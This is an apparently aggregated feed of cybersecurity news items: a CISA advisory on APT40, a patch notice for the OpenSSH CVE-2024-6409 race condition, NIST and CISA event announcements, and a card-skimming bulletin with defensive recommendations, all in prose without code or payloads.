Build the skills you need to create new opportunities and accelerate your understanding of Microsoft Cloud technologies at a free Microsoft 365 Virtual Training Day from Microsoft Learn. Join us at Prepare Your Organization for Microsoft Copilot for Microsoft 365 to learn how to implement AI to help ignite creativity, enhance productivity, and strengthen computing and collaboration skills. You’ll learn about the capabilities of Copilot, including how it works, how to configure it, and how to set it up for more powerful searches. You’ll also explore how Copilot works with Microsoft Graph—and your existing Microsoft 365 apps—to provide intelligent, real-time assistance. You will have the opportunity to: Understand the key components of Copilot for Microsoft 365 and how it works. Learn how to extend Copilot with plugins. Get guidance on completing the necessary Copilot technical and business requirements to prepare for implementation. Learn how to assign Copilot licenses, prepare your organization’s Microsoft 365 data for Copilot searches, and create a Copilot Center of Excellence. Join us at an upcoming Prepare Your Organization for Microsoft Copilot for Microsoft 365 event: Delivery Language: English Closed Captioning Language(s): English |
Visit the Microsoft Virtual Training Days website to learn more about other event opportunities. |
Author: blogmirnet
PRC State-Sponsored Group, APT 40
The Cybersecurity and Infrastructure Security Agency (CISA) has collaborated with the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) to release an advisory outlining a People’s Republic of China (PRC) state-sponsored cyber threat group’s activity. The following organizations also collaborated with ASD’s ACSC on the guidance: |
The National Security Agency (NSA) The Federal Bureau of Investigation (FBI) The United Kingdom’s National Cyber Security Centre (NCSC-UK) The Canadian Centre for Cyber Security (CCCS) The New Zealand National Cyber Security Centre (NCSC-NZ) The German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV) The Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center (NCSC) Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA) |
The advisory is based on current ACSC-led incident response investigations and shared understanding of a PRC state-sponsored cyber threat group, APT40—also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk in industry reporting. |
APT 40 has previously targeted organizations in various countries, including Australia and the United States. Notably, APT 40 possesses the ability to quickly transform and adapt vulnerability proofs of concept (POCs) for targeting, reconnaissance, and exploitation operations. APT 40 identifies new exploits within widely used public software such as Log4J, Atlassian Confluence, and Microsoft Exchange to target the infrastructure of the associated vulnerability. |
CISA urges all organizations and software manufacturers to review the advisory to help identify, prevent, and remediate APT 40 intrusions. Software vendors are also urged to incorporate Secure by Design principles into their practices to limit the impact of threat actor techniques and to strengthen the security posture of their products for their customers. |
For more information on PRC state-sponsored threat actor activity, see CISA’s People’s Republic of China Cyber Threat. To learn more about secure by design principles and practices, visit CISA’s Secure by Design webpage. |
A Vulnerability in OpenSSH Could Allow for Remote Code Execution – PATCH: NOW
A vulnerability has been discovered in OpenSSH that could allow for remote code execution. OpenSSH is a suite of secure networking utilities based on the SSH protocol and is crucial for secure communication over unsecured networks. It is widely used in enterprise environments for remote server management, secure file transfers, and various DevOps practices. Successful exploitation of this vulnerability could allow for remote code execution in the context of the unprivileged user running the sshd server. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
THREAT INTELLIGENCE:
There are no reports of this vulnerability being exploited in the wild.
SYSTEMS AFFECTED:
- OpenSSH versions 8.7 and 8.8 and corresponding portable versions
RISK:
Government:
- Large and medium government entities: High
- Small government entities: Medium
Businesses:
- Large and medium business entities: High
- Small business entities: Medium
Home users: Low
TECHNICAL SUMMARY:
A vulnerability has been discovered in OpenSSH, which could allow for remote code execution. Details of the vulnerability include:
Tactic: Initial Access (TA0001):
Technique: Exploit Public-Facing Application (T1190):
- CVE-2024-6409: A signal handler race condition vulnerability was found in OpenSSH’s server (sshd) where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd’s SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function.
Successful exploitation of this vulnerability could allow for remote code execution in the context of the unprivileged user running the sshd server. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
RECOMMENDATIONS:
We recommend the following actions be taken:
- Apply appropriate mitigations provided by OpenSSH or affected Linux vendor to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
- Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
- Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
- Safeguard 7.6: Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets: Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.
- Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
- Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
- Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
- Safeguard 5.4: Restrict Administrator Privileges to Dedicated Administrator Accounts: Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.
- Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. (M1035: Limit Access to Resource Over Network)
- Use intrusion detection signatures to block traffic at network boundaries. (M1031: Network Intrusion Prevention)
- Safeguard 13.3: Deploy a Network Intrusion Detection Solution: Deploy a network intrusion detection solution on enterprise assets, where appropriate. Example implementations include the use of a Network Intrusion Detection System (NIDS) or equivalent cloud service provider (CSP) service.
- Safeguard 13.8: Deploy a Network Intrusion Prevention Solution: Deploy a network intrusion prevention solution, where appropriate. Example implementations include the use of a Network Intrusion Prevention System (NIPS) or equivalent CSP service.
- Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. (M1050: Exploit Protection)
- Safeguard 13.10: Performing Application Layer Filtering: Perform application layer filtering. Example implementations include a filtering proxy, application layer firewall, or gateway.
REFERENCES:
OpenSSH:
http://www.openwall.com/lists/oss-security/2024/07/08/2
Oligo Security:
https://www.oligo.security/blog/critical-openssh-vulnerability-cve-2024-6387-regresshion
RedHat:
https://access.redhat.com/security/cve/CVE-2024-6409
Ubuntu:
https://ubuntu.com/security/CVE-2024-6409
CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6409
Still Time to Register! NCCoE Trusted IoT Onboarding Webinar
Date/Time: Wednesday, July 10, 2024 | 10:00–11:30 AM ET
Description
Join the NIST NCCoE for a webinar to discuss guidance and considerations for trusted IoT onboarding to help organizations safeguard both their IoT devices and their networks.
The NCCoE, in collaboration with 11 product and service providers, has produced five builds demonstrating network-layer onboarding and two builds demonstrating the factory provisioning process. The configurations offer secure ways to provision devices to a network using their network credentials.
Recently, we released the final draft publication of NIST Special Publication 1800-36, Trusted IoT Device Network-Layer Onboarding and Lifecycle Management, which includes updates to several of the builds. The public comment period for the publication is open until July 30, 2024.
During this webinar, attendees will:
- Meet the NCCoE IoT Onboarding team and their industry collaborators
- Learn about the latest updates to Draft NIST SP 1800-36, Trusted IoT Device Network-Layer Onboarding and Lifecycle Management, and how it can be used to help organizations protect both their IoT devices and their networks
- Hear from the project’s collaborators about example technology solutions using Wi-Fi Easy Connect, BRSKI, and Thread
- Engage in a Q&A period with the project team and industry experts
- Gain resources and additional information for implementation
Speakers
- Tim McBride, Deputy Director, NIST NCCoE
- Paul Watrobski, Principal Investigator, NIST NCCoE
- Brecht Wyseur, Senior Product Manager and Product Strategy, Kudelski IoT
- Nick Allott, CEO, NquiringMinds
- Steve Clark, Security Technologist, WISeKey
- Dan Harkins, Fellow, HPE Aruba
- Andy Dolan, Senior Security Engineer, CableLabs
- Craig Pratt, Lead Software Engineer, CableLabs
- Darshak Thakore, Principal Architect, CableLabs
Contact Us
If you have any questions about this event, please reach out to the team at iot-onboarding@nist.gov.
To receive the latest project news and updates, consider joining the NCCoE IoT Onboarding Community of Interest (COI). You can sign up by completing the COI form or by emailing the team declaring your interest.
Save the Date! Safeguarding Health Information: Building Assurance Through HIPAA Security Conference (Oct 23-24, 2024)
The U.S. Department of Health and Human Services Office for Civil Rights (OCR) and the National Institute of Standards and Technology (NIST) are excited to announce the return of the “Safeguarding Health Information: Building Assurance through HIPAA Security” conference for October 2024. After a 5-year absence, the conference is returning to Washington, D.C.
DATES: October 23–24, 2024
LOCATION: HHS Headquarters (Hubert H. Humphrey Building) in Washington, D.C.
CONTENT: The conference will explore the current healthcare cybersecurity landscape and the Health Insurance Portability and Accountability Act (HIPAA) Security Rule. This event will highlight the present state of healthcare cybersecurity, and practical strategies, tips and techniques for implementing the HIPAA Security Rule. The Security Rule sets federal standards to protect the confidentiality, integrity and availability of electronic protected health information by requiring HIPAA covered entities and their business associates to implement and maintain administrative, physical and technical safeguards.
The conference will offer sessions that explore best practices in managing risks to and the technical assurance of electronic health information. Presentations will cover a variety of topics including managing cybersecurity risk and implementing practical cybersecurity solutions, understanding current cybersecurity threats to the healthcare community, cybersecurity considerations for the Internet of Things (IoT) in healthcare environments, updates from federal healthcare agencies, and more.
Registration will open later in the summer.
Please contact ocrpresents@hhs.gov with questions or if you have recommendations for topics to include in the agenda. Hope to see you there!
Keyed-Hash Message Authentication Code (HMAC) | Draft SP 800-224 is Available for Public Comment
The initial public draft (ipd) of NIST Special Publication (SP) 800-224, Keyed-Hash Message Authentication Code (HMAC): Specification of HMAC and Recommendations for Message Authentication, is now available for public comment.
This publication includes the HMAC specification from Federal Information Processing Standard (FIPS) 198-1, The Keyed-Hash Message Authentication Code (HMAC) (2008) and incorporates some requirements from SP 800-107r1 (Revision 1), Recommendation for Applications Using Approved Hash Algorithms (2012). This development was proposed by the NIST Crypto Publication Review Board based on the reviews of FIPS 198-1 and SP 800-107r1 in 2022. The final version of SP 800-224 is expected to be published concurrently with the withdrawal of FIPS 198-1.
The public comment period is open through September 6, 2024. See the publication details for a copy of the draft; comments can be submitted to SP800-224-comments@list.nist.gov. Comments received in response to this request will be posted on the NIST website after the due date.
CISA is updating the National Cyber Incident Response Plan, listening session June 27
The Cybersecurity and Infrastructure Security Agency (CISA) is updating the National Cyber Incident Response Plan (NCIRP) 2024, the primary strategic framework for coordinating with the federal sector in response to significant cyber incidents.
In the spirit of whole of community response and collaborative cyber defense, CISA is inviting stakeholders from across public and private sectors, academia, and individual researchers, and experts in cybersecurity and response, to attend a series of three virtual NCIRP 2024 listening sessions.
The intent of these sessions is to hear feedback about the existing NCIRP and any experience with incident response coordination with the federal government more broadly. A draft of the NCIRP 2024 is being prepared and will be posted to CISA’s NCIRP webpage for public comment this summer. Perspectives gathered during the listening sessions will inform the update which will be published at the end of calendar year 2024.
CISA is releasing a newsletter series, New and Noteworthy, to support the NCIRP 2024 update. Each newsletter will keep the public informed on planning processes, plan development, and stakeholder engagement efforts in support of the NCIRP 2024.
The first listening session was held on May 8, 2024. During this session, CISA addressed the following topics:
- Overview of the NCIRP and the process for updating the 2024 Plan.
- The role of Information Sharing and Analysis Centers (ISACs).
- The integration of state, local, tribal, and territorial (SLTT) entities into cyber incident response.
- The role of state fusion centers in the information sharing process
- Cyber incident reporting, specifically, how to define who an “asset owner” is and who should be contacted during a significant cyber incident.
CISA has just announced its second listening session, which will be held on Thursday, June 27, 2024, from 1-2 p.m. EDT. See CISA’s second issue of New and Noteworthy to learn more and register.
For more information on the NCIRP, visit CISA’s NCIRP page.
Concept Paper Release and More Updates for the Privacy Framework 1.1 + Data Governance and Management Profile Workshop!
We have released concept papers for the NIST Privacy Framework (PF) Version 1.1 update as well as the Data Governance and Management (DGM) Profile. These concept papers will support discussion sessions at next week’s hybrid workshop. We encourage you to familiarize yourself with the material prior to participating in the workshop. If you would like to provide informal feedback on this material in addition to or in lieu of participating in the workshop, please send it to privacyframework@nist.gov by July 31, 2024.
We have extended the deadline for in-person registration to 11:59 PM EDT today, Thursday, June 20. Please be aware that breakout sessions are filling up quickly for in-person participants, so please register as soon as possible, if you have not already. Registration is free and required for this event.
Event registration, agenda, speakers, and other workshop information is available here.
If you have any questions, please email us at privacyframework@nist.gov.
We look forward to seeing you next week!
Best,
NIST Privacy Framework Team
CISA Releases Guidance on Single Sign-On (SSO) Adoption for Small and Medium-Sized Businesses: (SMBs)
Today, CISA released Barriers to Single Sign-On (SSO) Adoption for Small and Medium-Sized Businesses: Identifying Challenges and Opportunities, a detailed report exploring challenges to SSO adoption by small and medium-sized businesses (SMBs). The report also identifies potential ways to overcome these challenges and improve an SMB’s level of security.
CISA also released a related blog post, Why SMBs Don’t Deploy Single Sign-On (SSO), urging software manufacturers to consider how their business practices may inadvertently reduce the security posture of their customers.
For more information, visit CISA’s Secure by Design webpage. To learn more about identity and access management, visit Identity, Credential, and Access Management (ICAM).
Card Skimming Scams
Post Date:06/20/2024

Image Adapted From: FICO
Summary
Reported card skimming incidents increased by 40 percent from 2022 to 2023. More specifically, New Jersey is one of the top five states, accounting for nearly 50 percent of card compromise reports (CCRs). The outlook for 2024 shows an upward trend, which means increased card skimming opportunities for threat actors to capture and steal customer data and financial information through various physical and digital realms. Threat actors seek methods to conceal their attacks better and evade multiple security measures. This stolen data has severe consequences for consumers and businesses, including loss in revenue, legal damages, compliance issues, cross-site contamination, compromised personally identifiable information (PII), identity theft, fraud, and subsequent malicious activity.
Physical skimming devices are typically located at ATMs and point of sale (POS) systems, such as convenience stores, grocery stores, retail stores, gas stations, and restaurants. In addition to skimmers, hidden cameras and fake numerical keypads can capture and record keystrokes of PINS or passwords. Once the card is swiped, the skimming device stores the victim’s information, which can be physically retrieved later by the threat actors. However, the increasing use of cellular and Bluetooth technologies enables threat actors to remotely access victims’ data quickly with a low likelihood of detection.
Since the onset of 2024, physical skimmers have been identified and reported to law enforcement in New Jersey, including ATMs at Capital One Bank and Proponent Bank in Nutley, 2 ATMs at Wawa in Galloway Township, and card readers at Dollar Tree and Walmart in Bayonne and 7-Eleven in Cinnaminson and Pennsauken. Additionally, a skimmer was detected at Supremo Food Market in Pennsauken, and the latest reports of skimming devices were identified at Aldi Stores in Roselle and Union.
Furthermore, law enforcement charged a Lakehurst gas station employee with stealing customers’ information from their card purchases and making fraudulent purchases. Two men were also arrested for placing skimming devices on several Westfield ATMs to steal debit card information and use counterfeit debit cards in fraudulent cash withdrawals.
The online equivalent of physical skimming is digital or web skimming, found in POS systems such as retail stores, restaurants, financial institutions, and any online business that uses a POS provider. Magecart attacks are a type of web-based data skimming operation used to capture customer payment card data from the checkout pages of online stores. These attacks are accomplished by gaining access to the targeted website (either directly or through a supply chain attack), injecting malicious code into the checkout page to skim the desired data, and sending the information back to a threat actor-controlled server. Once threat actors steal the payment card information, they can use it to make fraudulent purchases or sell on the dark web or other marketplaces.
In February, researchers discovered threat actors exploiting a critical vulnerability, CVE-2024-20720, without user interaction. Threat actors inserted malicious XML code in the “layout_update” database table on Magento servers to create a persistent backdoor to the CMS controller and automatically inject malware and additional malicious payloads, including a fake Stripe payment skimmer designed to steal information from unsuspecting online shoppers.
In April, researchers found a card skimmer embedded in a fake Facebook Pixel tracker script, typically used to track advertisement-driven visitor activity on websites. Threat actors injected malware into compromised websites through tools that allow custom code, which monitors the fraudulent overlay and captures the card information if victims encounter a checkout page.
In May, threat actors exploited a vulnerability in WordPress in the Dessky Snippets plugin used by many websites. They added malicious PHP injections in the custom code on compromised websites. They altered the WooCommerce checkout process by manipulating the billing form and adding new fields to steal financial information. To add a sense of legitimacy, the threat actors used a tactic to reduce suspicion by turning off the autocomplete feature on the billing form to prevent web browsers from suggesting previously entered sensitive information and making it appear that the fields are standard inputs to complete the transaction.
Recommendations for Consumers
- When possible, use credit cards over debit cards for purchases, as credit cards often have greater consumer protections that limit a victim’s liability if fraudulent purchases are made.
- Enable payment charge notifications for every transaction on an account to be alerted of a fraudulent transaction as soon as it occurs.
- Before you use a POS system or ATM, check to see if there are signs of tampering.
- Use tap to pay or pay with your phone, as contactless or chip payment options are safer than swiping the card’s magnetic strip.
- Navigate directly to known, secure, and encrypted websites and designate or monitor one credit card for purchases, if possible.
- Enable multi-factor authentication (MFA) on every account that offers it, including any online shopping websites.
- Update browsers and use ad blockers.
Recommendations for Website Administrators
- Ensure hardware and software are up to date.
- Use strong, unique passwords for all accounts (admin, SFTP, database) and enable multi-factor authentication (MFA) on all administrative accounts at a minimum.
- Use only vetted first-party code.
- Use a web application firewall (WAF) to block and alert for potential code injection attacks.
- Block unauthorized transmission of personal data by implementing a Content Security Policy (CSP).
- Schedule routine website scans to identify changes in code composition.
Resources